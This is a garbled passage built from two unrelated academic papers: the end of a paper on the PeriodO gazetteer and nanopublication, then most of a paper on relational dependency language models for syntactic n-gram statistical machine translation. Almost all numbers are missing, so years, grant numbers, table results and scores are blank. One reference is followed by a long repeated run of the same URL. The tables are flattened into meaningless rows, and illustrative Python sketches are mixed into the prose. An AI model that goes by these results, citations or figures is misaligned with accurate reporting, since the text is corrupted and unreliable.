as scholars of all disciplines continue to integrate computational methods into their work, the need to preserve provenance will only become more important. this is as true in the humanities and social sciences as it is in the natural sciences. nanopublication is a useful way to locate the production of “data” within a wider scholarly context. in this way, it echoes old ideas about hypertext which were concerned with relations of provenance, authorship, and attribution (nelson, ). the periodo period gazetteer shows that this approach is relevant and feasible even for fields outside of the experimental, observable sciences.

additional information and declarations

funding
this work was generously funded by a digital humanities start-up grant from the national endowment for the humanities (grant number hd- - ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript.

grant disclosures
the following grant information was disclosed by the authors:
national endowment for the humanities: hd- - .

competing interests
the authors declare there are no competing interests.

author contributions
• patrick golden and ryan shaw conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper.

data availability
the following information was supplied regarding data availability:
periodo dataset: http://n t.net/ark:/ /p .

references
belarte mc. . domestic architecture and social differences in north-eastern iberia during the iron age (c. – bc). oxford journal of archaeology : – doi . /j. - . . .x.
bradley j, short h. . texts into databases: the evolving field of new-style prosopography. literary and linguistic computing (suppl. no. ): – doi . /llc/fqi .
buckland m. . description and search: metadata as infrastructure. brazilian journal of information science ( ): – . available at http://www .marilia.unesp.br/revistas/index.php/bjis/article/viewarticle/ .
carothers g, prud’hommeaux e. . rdf . turtle. w c recommendation, w c. available at http://www.w .org/tr/ /rec-turtle- /.
eisenstein e. . the printing press as an agent of change: communications and cultural transformations in early-modern europe. cambridge: cambridge university press.
elliott t, gillies s. . pleiades: an un-gis for ancient geography. in: digital humanities conference . stanford. available at http://dh abstracts.stanford.edu/xtf/view?docid=tei/ab- .xml.
gillies s. . event-like geojson features using json-ld. available at https://github.com/geojson/geojson-ld/blob/ f cf df e de a ed be a eada cc /time.md.
gradmann s. . from containers to content to context. journal of documentation ( ): – doi . /jd- - - .
groth p, gibson a, velterop j. . the anatomy of a nanopublication. information services & use ( – ): – doi . /isu- - .
groth p, schultes e, thompson m, tatum z, dumontier m. . nanopublication guidelines. in: concept web alliance working draft, concept web alliance. available at http://www.nanopub.org/ /wd-guidelines- /.
heath t, bizer c. . linked data: evolving the web into a global data space. synthesis lectures on the semantic web: theory and technology ( ): – doi . /s ed v y wbe .
hobbs j, pan f. . time ontology in owl. w c working draft, w c. available at http://www.w .org/tr/ /wd-owl-time- /.
/isu- - http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://www.nanopub.org/ /wd-guidelines- / http://dx.doi.org/ . 
modelling and optimizing on syntactic n-grams for statistical machine translation

rico sennrich, school of informatics, university of edinburgh, crichton street, edinburgh, scotland, uk

abstract
the role of language models in smt is to promote fluent translation output, but traditional n-gram language models are unable to capture fluency phenomena between distant words, such as some morphological agreement phenomena, subcategorisation, and syntactic collocations with string-level gaps. syntactic language models have the potential to fill this modelling gap. we propose a language model for dependency structures that is relational rather than configurational and thus particularly suited for languages with a (relatively) free word order. it is trainable with neural networks, and not only improves over standard n-gram language models, but also outperforms related syntactic language models. we empirically demonstrate its effectiveness in terms of perplexity and as a feature function in string-to-tree smt from english to german and russian. we also show that using a syntactic evaluation metric to tune the log-linear parameters of an smt system further increases translation quality when coupled with a syntactic language model.
1 introduction
many languages exhibit fluency phenomena that are discontinuous in the surface string, and are thus not modelled well by traditional n-gram language models. examples include morphological agreement, e.g. subject-verb agreement in languages that do not (exclusively) follow svo word order, subcategorisation, and collocations involving distant, but syntactically linked words.

syntactic language models try to overcome the limitation to a local n-gram context by using syntactically related words (and non-terminals) as context information. despite their theoretical attractiveness, it has proven difficult to improve smt with parsers as language models (och et al., ; post and gildea, ).

this paper describes an effective method to model, train, decode with, and weight a syntactic language model for smt. while all these aspects are important for successfully applying a syntactic language model, our primary contributions are a novel dependency language model which improves over prior work by making relational modelling assumptions, which we argue are better suited for languages with a (relatively) free word order, and the use of a syntactic evaluation metric for optimizing the log-linear parameters of the smt model.

while language models that operate on words linked through a dependency chain – called syntactic n-grams (sidorov et al., ) – can improve translation, some of the improvement is invisible to an n-gram metric such as bleu. as a result, tuning to bleu does not show the full value of a syntactic language model. what does show its value is an optimization metric that operates on the same syntactic n-grams that are modelled by the dependency lm.

the paper is structured as follows. section 2 describes our relational dependency language model; section 3 describes our neural network training procedure, and the integration of the model into an smt decoder. we describe the syntactic evaluation metric we use for tuning in section 4. the language models are evaluated on the basis of perplexity and smt performance in section 5. we discuss related work in section 6, and finish with concluding remarks in section 7.

2 a relational dependency language model
as motivation, and working example for the model description, consider the dependency tree in figure 1, which is taken from the output of our baseline string-to-tree smt system. the output contains two errors:
• a morphological agreement error between the subject ergebnisse (plural) and the finite verb wird (singular).
• a subcategorisation error: überraschen is transitive, but the translation has a prepositional phrase instead of an object.

[figure 1: translation output of the baseline english→german string-to-tree smt system, "die ergebnisse der jüngsten umfrage wird für viele überraschen.", with the original dependency representation and its conversion into a constituency representation.]

while these errors might not have occurred if the words involved were adjacent to one another here and throughout the training set, non-adjacency is common, especially since the distance between subject and finite verb, or between a full verb and its arguments, can be arbitrarily long.

prior work on syntactic language modelling has typically focused on english, and we argue that some modelling decisions do not transfer well to other languages. the dependency models proposed by shen et al. ( ) and zhang ( ) rely heavily on structural information such as the direction and distance of the dependent from the parent.
in a language where the order of syntactic dependents is more flexible than in english, such as german (german has a strict word order within noun phrases and for the placement of verbs, but different word orders for main clauses and subordinated clauses, and some flexibility in the order of dependents of a verb), grammatical function (and thus the inflection) is hard to predict from the dependent order. instead, we make dependency labels, which encode grammatical relations, a core element of our model. (the tree is converted into constituency format for compatibility with scfg decoding algorithms, with dependency edges represented as non-terminal nodes.) tsarfaty ( ) classifies parsing approaches into configurational approaches that rely on structural information, and relational ones that take grammatical relations as primitives; while she uses dependency syntax as a prototypical example of relational approaches, the dependency lm by shen et al. ( ) would fall into the configurational category, while ours is relational.

shen et al. ( ) propose a model that estimates the probability of each token given its parent and/or preceding siblings. we start with a variant of their model that does not hard-code configurational modelling assumptions, and then extend it by including dependency labels.

2.1 unlabelled model
let s be a sequence of terminal symbols w_1, w_2, ..., w_n with a dependency topology t, and let hs(i) and ha(i) be lists of heads of preceding siblings and ancestors of w_i according to t, from closest to furthest. in our example in figure 1:
• w_4 = jüngsten
• hs(4) = (der)
• ha(4) = (umfrage, ergebnisse, wird, �)

note that ha and its subsequences are instances of syntactic n-grams. for this model, we follow related work and assume that t is available (popel and marecek, ), approximating p(s) as p(s|t). we make the markov assumption that the probability of each word only depends on its preceding siblings and ancestors (shen et al. ( ) use the siblings that are between the word and its parent, i.e. the following siblings if the word comes before its parent; we believe both preceding and following siblings are potentially useful, but leave expansion of the context to future work), and decompose the probability of a sentence like this:

p(s) = p(w_1, w_2, \ldots, w_n) \approx \prod_{i=1}^{n} p(w_i \mid hs(i), ha(i))   (1)

we further make the markov assumption that only a fixed window of the closest q siblings, and the closest r ancestors, affect the probability of a word:

p(s) \approx \prod_{i=1}^{n} p(w_i \mid hs(i)^{q}, ha(i)^{r})   (2)

equation 2 represents our basic, unlabelled model.
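to make the definitions concrete, the following is a minimal python sketch, under stated assumptions, of how the contexts hs(i) and ha(i) and the factorization of equation 2 could be computed for the working example; the node class, the padding tokens and the placeholder probability function are illustrative inventions, not the paper's implementation (which uses the neural networks of section 3).

# illustrative sketch (not the paper's code): extracting the sibling/ancestor
# contexts of the unlabelled model (equation 2) from a toy dependency tree.
from math import log

class Node:
    def __init__(self, head, label, parent=None):
        self.head = head            # head word of the node
        self.label = label          # dependency label of the incoming arc
        self.parent = parent
        self.children = []
        if parent is not None:
            parent.children.append(self)

def hs(node, q, pad="<no_sibling>"):
    """heads of preceding siblings, closest first, padded to length q."""
    sibs = node.parent.children[:node.parent.children.index(node)] if node.parent else []
    heads = [s.head for s in reversed(sibs)]
    return (heads + [pad] * q)[:q]

def ha(node, r, pad="<no_ancestor>"):
    """heads of ancestors, closest first, padded to length r."""
    heads, p = [], node.parent
    while p is not None:
        heads.append(p.head)
        p = p.parent
    return (heads + [pad] * r)[:r]

def sentence_logprob(words, prob, q=2, r=2):
    """equation 2: sum of log p(w_i | hs(i)^q, ha(i)^r) over the terminals."""
    return sum(log(prob(n.head, hs(n, q), ha(n, r))) for n in words)

# toy version of the working example "die ergebnisse der juengsten umfrage wird ..."
root = Node("<root>", "vroot")
wird = Node("wird", "aux", root)
ergebnisse = Node("ergebnisse", "subj", wird)
die = Node("die", "det", ergebnisse)
umfrage = Node("umfrage", "gmod", ergebnisse)
der = Node("der", "det", umfrage)
juengsten = Node("juengsten", "attr", umfrage)

print(hs(juengsten, 2), ha(juengsten, 4))
# ['der', '<no_sibling>'] ['umfrage', 'ergebnisse', 'wird', '<root>']
uniform = lambda w, s, a: 1e-4      # placeholder for the trained network
print(sentence_logprob([die, ergebnisse, der, juengsten, umfrage, wird], uniform))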
it differs from the model of shen et al. ( ) in two ways. first, it uses separate context windows for siblings and ancestors. in contrast, shen et al. ( ) treat the ancestor as the first symbol in a context window that is shared between the ancestor and siblings. our formulation encodes our belief that the model should always assume dependence on the r nearest ancestor nodes, regardless of the number of siblings. secondly, shen et al. ( ) separate dependents to the left and to the right of the parent. while the fixed svo verb order in english is compatible with such a separation, allowing pl to model subjects and pr to model objects, most arguments can occur before or after the head verb in german main clauses. we thus argue that left and right dependents should be modelled by a single model to allow for sharing of statistical strength.

2.2 labelled model
the motivation for the inclusion of dependency labels is twofold. firstly, having dependency labels in the context serves as a strong signal for the prediction of the correct inflectional form. secondly, dependency labels are the appropriate level of abstraction to model subcategorisation frames (similar arguments have been made for parsing of (relatively) free word-order languages, e.g. by tsarfaty et al. ( )).

let d be a sequence of dependency labels l_1, l_2, ..., l_n, with each label l_i being the label of the incoming arc at position i in t, and ls(i) and la(i) the lists of dependency labels of the siblings and ancestors of w_i, respectively. continuing the example for w_4, these are:
• l_4 = attr
• ls(4) = (det)
• la(4) = (gmod, subj, vroot, sent)

we predict both the terminal symbols s and dependency labels d. the latter lets us model subcategorisation by penalizing unlikely relations, e.g. objects whose parent is an intransitive verb. we decompose p(s,d) into p(d) × p(s|d) to obtain:

p(s,d) = p(d) \times p(s \mid d) \approx \prod_{i=1}^{n} p_l(i) \times p_w(i)
p_l(i) = p(l_i \mid hs(i)^{q}, ls(i)^{q}, ha(i)^{r}, la(i)^{r})
p_w(i) = p(w_i \mid hs(i)^{q}, ls(i)^{q}, ha(i)^{r}, la(i)^{r}, l_i)   (3)

2.3 head and label extraction
we here discuss some details for the extraction of the context hs and ha. dependency structures require no language-specific head extraction rules, even in a converted constituency representation. in the constituency representation shown in figure 1, each non-terminal node in the tree that is not a pre-terminal has exactly one pre-terminal child. the head of a non-terminal node can thus be extracted by identifying the pre-terminal child, and taking its terminal symbol as head. an exception is the virtual node sent, which is added to the root of the tree to combine subtrees that are not connected in the original grammar, e.g. the main tree and the punctuation symbol. if a node has no pre-terminal child, we use a special token � as its head.

if the sibling of a node is a pre-terminal node, we represent this through a special token in hs and ls. we also use special out-of-bound tokens (separate for hs, ha, ls and la) to fill up the context window if the window is larger than the number of siblings and/or ancestors.

the context extraction rules are language-independent and can be applied to any dependency structure. language-specific or grammar-specific rules are possible in principle. for instance, for verbal heads in german, one could consider separable verb prefixes part of the head, and thus model differences in subcategorisation between schlagen (engl. beat) and schlagen ... vor (engl. suggest).

2.4 predicting the tree topology
the model in equation 3 still assumes the topology of the dependency tree to be given, and we remedy this by also predicting pre-terminal nodes, and a virtual stop node as the last child of each node. this models the position of the head in a subtree (through the prediction of pre-terminal nodes), and the probability that a word has no more dependents (by assigning probability mass to the stop node).
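the following short python sketch, under assumptions chosen for illustration, enumerates the prediction steps of this generation order for the subtree of figure 2 ("der jüngsten umfrage"), including the pre-terminal and virtual stop steps; the tuple encoding of the tree and the token names are hypothetical, not the paper's data structures.

# illustrative sketch: top-down, depth-first prediction steps of section 2.4
# (labels l_i and words w_i, with "pt" and "stop" steps) for a toy subtree.
EMPTY = "<empty>"   # stands in for the special empty-head token

def prediction_steps(label, head, children, is_pt=False):
    """yield (l_i, w_i) pairs for a node given as (label, head, children)."""
    yield ("pt" if is_pt else label, head if head is not None else EMPTY)
    if not is_pt:
        for child in children:            # depth-first, in surface order
            yield from prediction_steps(*child)
        yield ("stop", EMPTY)             # virtual stop: no further dependents

# subtree of figure 2: gmod(umfrage) with dependents det(der) and attr(juengsten);
# each non-terminal has exactly one pre-terminal child marking its head position
PT = (None, None, [], True)
subtree = ("gmod", "umfrage",
           [("det", "der", [PT]), ("attr", "juengsten", [PT]), PT])

print(list(prediction_steps(*subtree)))
# [('gmod', 'umfrage'), ('det', 'der'), ('pt', '<empty>'), ('stop', '<empty>'),
#  ('attr', 'juengsten'), ('pt', '<empty>'), ('stop', '<empty>'),
#  ('pt', '<empty>'), ('stop', '<empty>')]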
instead of generating all n terminal symbols as in equation 3, we generate all m nodes in the dependency tree in top-down, depth-first order, with l_i being pt for pre-terminals, and the node label otherwise, and w_i being either the head of the node, or � if the node has no pre-terminal child. our final model is given in equation 4:

p(s,d,t) \approx \prod_{i=1}^{m} \begin{cases} p_l(i) \times p_w(i) & \text{if } w_i \neq \text{�} \\ p_l(i) & \text{otherwise} \end{cases}   (4)

[figure 2: snippet of prediction steps when generating terminals (top) or all nodes in the tree (bottom) for the dependency tree in figure 1. generating terminals only: d = (det, attr, gmod), s = (der, jüngsten, umfrage); generating all nodes: d = (gmod, det, pt, stop, attr, pt, stop, pt, stop), s = (umfrage, der, �, �, jüngsten, �, �, �, �).]

figure 2 illustrates the prediction of a subtree of the dependency tree in figure 1. note that t is encoded implicitly, and can be retrieved from d through a stack to which all nodes (except for pre-terminal and stop nodes) are pushed after prediction, and from which the last node is popped when predicting a stop node.

3 neural network training and smt decoding
we extract all training instances from automatically parsed training text, and perform training with a standard feed-forward neural network (bengio et al., ), using the nplm toolkit (vaswani et al., ). back-off smoothing schemes are unsatisfactory because it is unclear which part of the context should be forgotten first, and neural networks elegantly solve this problem. we use two separate networks, one for p_w and one for p_l. both networks share the same input vocabulary, but are trained and applied independently. the model input is a (2q + 2r)-word context vector (+1 for p_w to encode l_i), each word being mapped to a shared embedding layer. we use a single hidden layer with rectified-linear activation function, and noise-contrastive estimation (nce).

we integrate our dependency language models into a string-to-tree smt system as additional feature functions that score each translation hypothesis. the model in equation 4 predicts p(s,d,t). obtaining the probability of the translation hypothesis p(s) would require the (costly) marginalization over all sequences of dependency labels d and topologies t, but like the smt decoder itself, we approximate the search for the best translation by searching for the highest-scoring derivation, meaning that we directly integrate p_w and p_l as two features into the log-linear smt model. we use self-normalized neural networks with precomputation of the hidden layer, which makes the integration into decoding reasonably fast.

the decoder builds the translation bottom-up, and the full context is not available for all symbols in the hypothesis. vaswani et al. ( ) propose to use a special null word for unavailable context, their embedding being the weighted average of the input embeddings of all other words. we adopt this strategy, with the difference that we use separate null words for each position in the context window in order to reflect distributional differences between the different positions, e.g. between ancestor labels and sibling labels. symbols are re-scored as more context becomes available in decoding, but poor approximations could affect pruning and thus lead to search errors. in table 1, we illustrate the use of null words with a -gram and a bigram nnlm model.

model     input        entropy rate
 -gram    a b c d e    .
bigram    d e          .
 -gram    � � � d e    .
table 1: handling unavailable input words by replacing them with null words.
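the padding behind table 1 can be pictured with a few lines of python; the null-token naming below is an assumption made here for readability, while in the actual system each null word is a learned embedding inside the neural network.

# illustrative sketch: left-padding an incomplete context with
# position-specific null words, as in the last row of table 1.
def pad_ngram(known_tokens, n, prefix="w"):
    """pad a (possibly short) n-gram on the left with position-specific nulls."""
    missing = n - len(known_tokens)
    nulls = [f"<null_{prefix}_{i}>" for i in range(missing, 0, -1)]
    return nulls + list(known_tokens)

# querying a 5-token window (size chosen only for the example) when just
# the bigram "d e" is available during bottom-up decoding:
print(pad_ngram(["d", "e"], 5))
# ['<null_w_3>', '<null_w_2>', '<null_w_1>', 'd', 'e']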
we observe a small increase in entropy when querying the -gram model with bigrams, compared to querying a bigram model directly.

some hierarchical smt systems allow glue rules which concatenate two subtrees. since the resulting glue structures do not occur in the training data, we do not estimate their probability in our model. when encountering the root of a glue rule in our language model, we recursively evaluate its children, but ignore the glue node itself. this could introduce a bias towards using more glue rules during translation. to counter this, and encourage the production of linguistically plausible trees, we assign a fixed, high cost to glue rules. glue rules thus play a small role in our systems, with about glue rule applications per sentences, and could be abandoned entirely. (for efficiency reasons, our experimental systems only perform scfg parsing for spans of up to words, and use glue rules to concatenate partial derivations in longer sentences; better decoding algorithms have reduced the need for this limit (sennrich, ).)

4 optimizing syntactic n-grams
n-gram based metrics such as bleu (papineni et al., ) are still predominantly used to optimize the log-linear parameters of smt systems, and (to a lesser extent) to evaluate the final translation systems. however, n-gram metrics are not well suited to measure fluency phenomena with string-level gaps, and there is a danger that bleu underestimates the modelling power of dependency language models, resulting in a suboptimal assignment of log-linear weights.

as an alternative metric that operates on the level of syntactic n-grams, we use a variant of the head-word chain metric (hwcm) (liu and gildea, ). hwcm is a precision metric similar to bleu, but instead of counting n-gram matches between the translation output and the reference, it compares head-word chains, or syntactic n-grams. hwcm is not only suitable for our task because it operates on the same structures as the dependency language models, but also because our string-to-tree smt architecture produces trees that can be evaluated directly, without requiring a separate parse of the translation output, a task for which few parsers are optimized. for extracting syntactic n-grams from the reference translations of the respective development and test sets, we automatically parse them, using the same preprocessing as for training.

we count syntactic n-grams of sizes to , mirroring the typical usage of bleu. banerjee and lavie ( ) have demonstrated the importance of recall in mt evaluation, and we compute the harmonic mean of precision and recall, which we denote hwcmf, instead of the original, precision-based metric.
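as a rough illustration of an hwcm-style score with recall, the sketch below extracts head-word chains (syntactic n-grams along the ancestor path) from dependency trees and combines chain precision and recall into an f-score; the pooling over chain lengths, the maximum chain length and the toy data are assumptions of this sketch, not necessarily identical to the metric used in the paper.

# illustrative sketch of an hwcm-style f-score over head-word chains.
from collections import Counter

def head_word_chains(words, heads, max_n=4):
    """count chains w_i -> parent -> ... of length 1..max_n; heads[i] is the
    parent index of word i, or None for the root."""
    chains = Counter()
    for i, w in enumerate(words):
        chain, j = [w], i
        for _ in range(max_n):
            chains[tuple(chain)] += 1
            j = heads[j]
            if j is None:
                break
            chain.append(words[j])
    return chains

def hwcm_f(hyp, ref):
    hyp_chains, ref_chains = head_word_chains(*hyp), head_word_chains(*ref)
    matches = sum((hyp_chains & ref_chains).values())    # clipped chain matches
    p = matches / max(sum(hyp_chains.values()), 1)
    r = matches / max(sum(ref_chains.values()), 1)
    return 2 * p * r / (p + r) if p + r else 0.0

# toy trees: word lists plus parent indices (None marks the root)
hyp = (["die", "ergebnisse", "wird", "ueberraschen"], [1, 2, None, 2])
ref = (["die", "ergebnisse", "werden", "ueberraschen"], [1, 2, None, 2])
print(round(hwcm_f(hyp, ref), 2))   # 0.5 for this toy pair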
million sentence pairs of parallel data and million sen- tences of monolingual german data. we train all language models on the german side of the par- allel text and the monolingual data. we also per- form some experiments on the english→russian data from the same translation task, with million sentence pairs of parallel data and million sen- tences of monolingual russian data. for a -gram neural network lm baseline (nnlm), and the dependency language models, we train feed-forward neural network language models with the nplm toolkit. we use dimensions for the input embeddings, and a single hidden layer with dimensions. we use a vocabulary of words ( for the output vocabulary of pl), from which we draw noise samples for nce ( for pl). we train for two epochs, each epoch being a full traversal of the training text. for unknown words, we back-off to a special unk token for the sequence models and pl, and to the pre-terminal symbol for the other dependency models. we report perplex- ity values with softmax normalization, but disable normalization during decoding, relying on the self- normalization of nce for efficiency. for the transla- tion experiments with dlm and rdlm, we set the sibling window size q to , and the ancestor window size r to . we train baseline language models with interpo- lated modified kneser-ney smoothing with srilm on our test set, a node has an average of . ancestors (σ = . ), and . left siblings (σ = . ). (stolcke, ). the model in the smt baseline uses the full vocabulary and a linear interpolation of component models for domain adaptation. for the perplexity evaluation, we use the same vocabulary and training data as for the neural network models. for the english→german smt evaluation, our baseline system is a string-to-tree smt system with moses (koehn et al., ), with dependency pars- ing of the german texts (sennrich et al., ). it is described in more detail in (williams et al., ). this setup was ranked – (out of ) in the wmt shared translation task and is state- of-the art. our biggest deviation from this setup is that we do not enforce the morphological agree- ment constraints that are provided by a unification grammar (williams and koehn, ), but use them for analysis instead. for english→russian, we copy the language-independent settings from the the english→german set-up, and perform dependency parsing with a russian model for the maltparser (nivre et al., ; sharoff and nivre, ), ap- plying projectivization after parsing. we tune our system on a development set of sentences with k-best batch mira (cherry and fos- ter, ) on bleu and a linear interpolation of bleu and hwcmf , and report both scores for eval- uation. we also report meteor (denkowski and lavie, ) for german and ter (snover et al., ). we control for optimizer instability by run- ning the optimization three times per system and performing significance testing with multeval (clark et al., ), which we enhanced to also perform sig- nificance testing for hwcmf . . implementation notes on model by shen et al. ( ) we reimplement the model by shen et al. ( ) for our evaluation. the authors did not specify training and smoothing of their model, so we only adopt their definition of the context window, and use the same neural network architecture as for our other models. specifically, we use two neural networks: one for left dependents, and one for right dependents. we use maximum-likelihood estimation for the head of root nodes, ignoring unseen events. 
to distinguish between parents and siblings in the context window, we double the input vocabulary and mark parents with a suffix. like shen et al. ( ), we ignore the language model perplexity entropy ref. -best difference -gram (kn) . . - . % -gram nnlm . . . % shen et al. ( ) . . . % dlm (q= ; r= ) . . . % dlm (q= ; r= ) . . . % rdlm (q= ; r= ) . . . % rdlm, pw . . . % rdlm, pl . . . % table : perplexity of different neural network language models (and baseline with kneser-ney smoothing) on german reference translation (newstest ) and base- line english→german translation output. our goal is a language model that prefers the reference over the trans- lation hypothesis, indicated by a lower perplexity and a positive entropy difference. prediction of stop labels, meaning that our imple- mentation assumes the dependency topology to be given. we use a trigram model like the original au- thors. peter et al. ( ) experiment with higher or- ders variants, but do not consider grandparent nodes. we consider scalability to a larger ancestor context a real concern, since another duplication of the vo- cabulary may be necessary for each ancestor level. . perplexity there are a number of factors that make a direct comparison of the reference set perplexity unfair. mainly, the unlabelled dependency model dlm and the one by shen et al. ( ) assume that the de- pendency topology is given; pw even assumes this for the dependency labels d. conversely, the full rdlm predicts the terminal sequence, the depen- dency labels, and the dependency topology, and we thus expect it to have a higher perplexity. also note that we compare -gram n-gram models to - and - gram dependency models. a more minor difference is that n-gram models also predict end-of-sentence tokens, which the dependency models do not. rather than directly comparing perplexity be- tween different models, our focus lies on a perplex- ity comparison between a human reference transla- tion and the -best smt output of a baseline transla- for better comparability, we measure perplexity per surface word, not per prediction. tion system. our basic assumption is that the differ- ence in perplexity (or cross-entropy) tells us whether a model contains information that is not already part of the baseline model, and if incorporating it into our smt system can nudge the system towards produc- ing a translation that is more similar to the reference. results for english→german are shown in ta- ble . the baseline -gram language model with kneser-ney smoothing prefers the smt output over the reference translation, which is natural given that this language model is part of the system producing the smt output. the -gram nnlm improves over the kneser-ney models, and happens to assign al- most the same perplexity score to both texts. this still means that it is less biased towards the smt output than the baseline model, and can be a valu- able addition to the model. the dependency language models all show a pref- erence for the reference translation, with dlm hav- ing a stronger preference than the model by shen et al. ( ), and rdlm having the strongest prefer- ence. the direct comparison of dlm and pw, which is the component of rdlm that predicts the termi- nal symbols, shows that dependency labels serve as a strong signal for predicting the terminals, confirm- ing our initial hypothesis. the prediction of the de- pendency topology and labels through pl means that the full rdlm has the highest perplexity of all mod- els. 
however, it also strongly prefers the human ref- erence text over the baseline smt output. . translation quality translation results for english→german with dif- ferent language models added to our baseline are shown in table . considering the systems tuned on bleu, we observe that the -gram nnlm and rdlm are best in terms of bleu and ter, but that rdlm is the only winner according to hwcmf and meteor. in particular, we observe a sizable gap of . hwcmf points between the nnlm and the rdlm systems, despite similar bleu scores. the unlabelled dlm and the dependency lm by shen et al. ( ), which are generally weaker than rdlm, also tend to improve hwcmf more than bleu. this reflects the fact that the dependency we denote a system a winner if no other system [in the group of systems under consideration] is significantly better ac- cording to significance testing with multeval. mira system dev newstest newstest objective bleu hwcmf meteor ter bleu hwcmf meteor ter bleu hwcmf meteor ter bleu baseline . . . . . . . * . . . . * . -gram nnlm . . . * . . . . . . . . * . shen et al. ( ) . * . . * . . . . * . . . . * . dlm . * . . * . . . . * . . . . * . rdlm . . . * . . . . * . . . . * . -gram + rdlm . . . * . . . . * . . . . * . bleu + hwcmf baseline . . * . . * . * . * . . * . * . * . . * -gram nnlm . . * . . * . * . * . . * . * . . . * shen et al. ( ) . . * . . * . * . * . . * . * . * . . * dlm . . * . . * . . * . . * . * . * . . * rdlm . . * . . * . * . * . . * . * . * . . * -gram + rdlm . . * . . * . * . * . . * . * . * . . * table : translation quality of english→german string-to-tree smt system with different language models, with k- best batch mira optimization on bleu and bleu+hwcmf . average of optimization runs. bold: no other system in same block is significantly better (p < . ); *: significantly better than same model with other mira objective (p < . ). higher scores are better for bleu, hwcmf and meteor; lower scores are better for ter. lms improve fluency along the syntactic n-grams that hwcm measures, whereas nnlm only im- proves local fluency, to which bleu is most sen- sitive. the fact that the models cover different phe- nomena is also reflected in the fact that we see fur- ther gains from combining the -gram nnlm with the strongest dependency lm, rdlm, for a total im- provement of . – . bleu over the baseline. if we use bleu+hwcmf as our tuning objec- tive, the difference between the models increases. compared to the -gram nnlm, the rdlm system gains . – . points in hwcmf and . – . points in bleu. compared to the original baseline, tuned only on bleu, the system with rdlm that is tuned on bleu+hwcmf yields an improvement of . – . bleu and . – . hwcmf . if we compare the same system being trained on both tuning objectives, we observe that tuning on bleu+hwcmf , unsurprisingly, yields higher hwcmf scores than tuning on bleu only. what is more surprising is that adding hwcmf as a tun- ing objective also yields significantly higher bleu on the test sets for out of data points. the gap is larger for the two systems with rdlm ( . – . bleu) than for the baseline or the nnlm system ( . – . bleu). we hypothesize that the inclusion of hwcmf as a tuning metric reduces overfitting and encourages the production of more grammat- ically well-formed constructions, which we expect to be a robust objective across different texts, espe- cially when coupled with a strong dependency lan- guage model such as rdlm. some example translations are shown in table . 
they illustrate three error types in the baseline sys- tem: . an error in subject-verb agreement. . a subcategorisation error: gelten is a valid translation of the intransitive meaning of apply, but cannot be used for transitive constructions, where anwenden is correct. . a collocation error: two separate collocations are conflated in the baseline translation: • reach a decision on [...] eine entscheidung über [...] treffen • reach an agreement on [...] eine einigung über [...] erzielen all errors are due to inter-dependencies in the sen- tence that have string-level gaps, but which can be modelled through syntactic n-grams, and are cor- rected by the system with rdlm and tuning on bleu+hwcmf . we evaluate a subset of the systems on an english→russian task to test whether the im- provements from adding rdlm and tuning on bleu+hwcmf apply to other language pairs. re- sults are shown in table . the system with rdlm source also the user manages his identity and can therefore be anonymous. baseline auch der benutzer verwaltet seine identität und können daher anonym sein. best auch der benutzer verwaltet seine identität und kann daher anonym sein. reference darüber hinaus verwaltet der inhaber seine identität und kann somit anonym bleiben. source how do you apply this definition to their daily life and social networks? baseline wie kann man diese definition für ihr tägliches leben und soziale netzwerke gelten? best wie kann man diese definition auf ihren alltag und sozialen netzwerken anwenden? reference wie wird diese definition auf seinen alltag und die sozialen netzwerke angewendet? source the city council must reach a decision on this in december. baseline der stadtrat muss im dezember eine entscheidung darüber erzielen. best im dezember muss der stadtrat eine entscheidung darüber treffen. reference im dezember muss dann noch die stadtverordnetenversammlung entscheiden. table : smt output of baseline system and best system (rdlm tuned on bleu+hwcmf ). mira system dev newstest newstest objective bleu hwcmf ter bleu hwcmf ter bleu hwcmf ter bleu baseline . . . . . . . . . dlm . * . . . . . . . . rdlm . . . . . . . . . bleu+ hwcmf baseline . . * . * . . * . * . . * . * dlm . . * . * . . * . * . . * . * rdlm . . * . * . . * . * . * . * . * table : translation quality of english→russian string-to-tree smt system with dlm and rdlm, with k-best batch mira optimization on bleu and bleu+hwcmf . average of optimization runs. bold: no other system in same block is significantly better (p < . ); *: significantly better than same model with other mira objective (p < . ). higher scores are better for bleu and hwcmf ; lower scores are better for ter. is the consistent winner, and significantly outper- 